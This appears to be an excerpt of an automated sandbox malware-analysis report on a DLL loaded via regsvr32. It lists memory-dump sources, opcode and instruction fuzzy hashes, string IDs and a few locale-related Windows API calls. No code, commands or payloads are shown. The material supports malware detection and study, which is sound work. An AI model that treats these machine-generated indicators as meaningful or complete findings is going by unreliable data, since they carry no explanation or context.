                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ;SH$nK
                                                                                                                                      • API String ID: 0-1681473137
                                                                                                                                      • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                      • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                                                                                      • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                      • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$z
                                                                                                                                      • API String ID: 0-3532108746
                                                                                                                                      • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                      • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                                                                                      • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                      • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g/?$~l;
                                                                                                                                      • API String ID: 0-1448562259
                                                                                                                                      • Opcode ID: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                                                                                      • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                                                                                      • Opcode Fuzzy Hash: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                                                                                      • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JM$S
                                                                                                                                      • API String ID: 0-422059844
                                                                                                                                      • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                      • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                                                                                      • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                      • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \4t$sT>
                                                                                                                                      • API String ID: 0-514966222
                                                                                                                                      • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                      • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                                                                                      • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                      • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6 zT$lh
                                                                                                                                      • API String ID: 0-3667112246
                                                                                                                                      • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                      • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                                                                                      • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                      • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2Q'$t<p
                                                                                                                                      • API String ID: 0-2959822804
                                                                                                                                      • Opcode ID: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                                                                                      • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                                                                                      • Opcode Fuzzy Hash: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                                                                                      • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 95s$\`s
                                                                                                                                      • API String ID: 0-3495284040
                                                                                                                                      • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                      • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                                                                                      • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                      • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 3*$qMu
                                                                                                                                      • API String ID: 0-4093015089
                                                                                                                                      • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                      • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                                                                                      • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                      • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$"n&E
                                                                                                                                      • API String ID: 0-1188898577
                                                                                                                                      • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                      • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                                                                                      • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                      • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Bw~$fy
                                                                                                                                      • API String ID: 0-1663007907
                                                                                                                                      • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                      • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                                                                                      • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                      • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /0$XyLe
                                                                                                                                      • API String ID: 0-3562702181
                                                                                                                                      • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                      • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                                                                                      • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                      • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >I$>I
                                                                                                                                      • API String ID: 0-3948471910
                                                                                                                                      • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                      • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                                                                                      • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                      • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {H2}$}i#c
                                                                                                                                      • API String ID: 0-1724349491
                                                                                                                                      • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                      • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                                      • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                      • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4V$so
                                                                                                                                      • API String ID: 0-1060102820
                                                                                                                                      • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                      • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                                      • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                      • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: F+'$O$
                                                                                                                                      • API String ID: 0-4064122715
                                                                                                                                      • Opcode ID: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
                                                                                                                                      • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                                      • Opcode Fuzzy Hash: 65d5816d26685df18d8fe2bf41853c6ad5a30473c75acd7588c5af8b031b1464
                                                                                                                                      • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 1$bO6
                                                                                                                                      • API String ID: 0-3242911120
                                                                                                                                      • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                      • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                                      • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                      • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )j-J$\rba
                                                                                                                                      • API String ID: 0-105394296
                                                                                                                                      • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                      • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                                      • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                      • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5T$7c
                                                                                                                                      • API String ID: 0-2666566123
                                                                                                                                      • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                      • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                                      • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                      • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ",)x$PX
                                                                                                                                      • API String ID: 0-926260526
                                                                                                                                      • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                      • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                                                                                      • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                      • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                      • Instruction ID: e0aa5e82a5587fcb6d79047492276294cfbe51b533383ada6fea977ef93beab3
                                                                                                                                      • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                      • Instruction Fuzzy Hash: 7F11C832F0C5964DFB719A65E4523F923D0AB94788F444973DA8DE6281EE9CE4468B03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                      • Instruction ID: 3d3682c1a0220432d9793809988706c8b776f9cfbe094d92f208385a0d1be138
                                                                                                                                      • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                      • Instruction Fuzzy Hash: 35113072E086158FFB188B31C49537936D0EBA4B09F1448B6C60D962C6EFFCD5948A87
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFFE2315A8C), ref: 00007FFFE231C8FD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                      • Instruction ID: a9215711a9efa2e4c0e8af24762aa6cf18dc8caeb012252035b89ba89470a4a3
                                                                                                                                      • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                      • Instruction Fuzzy Hash: 5BF0A462E0851A4EF7588A31D4153B923E1ABA4B44F1884B3C64DD22CAEFECD5A18A43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3731964398-0
                                                                                                                                      • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                      • Instruction ID: 08da0fb49a663e0fbe6cdc0e8cbb5dac8b17cc69508a0c358f3173ca6b6d0493
                                                                                                                                      • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                      • Instruction Fuzzy Hash: 75F0BE22A087C083D7108B0AF44415AE7A0FBD4BE0F588221EA9D57B99DF6CC852CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
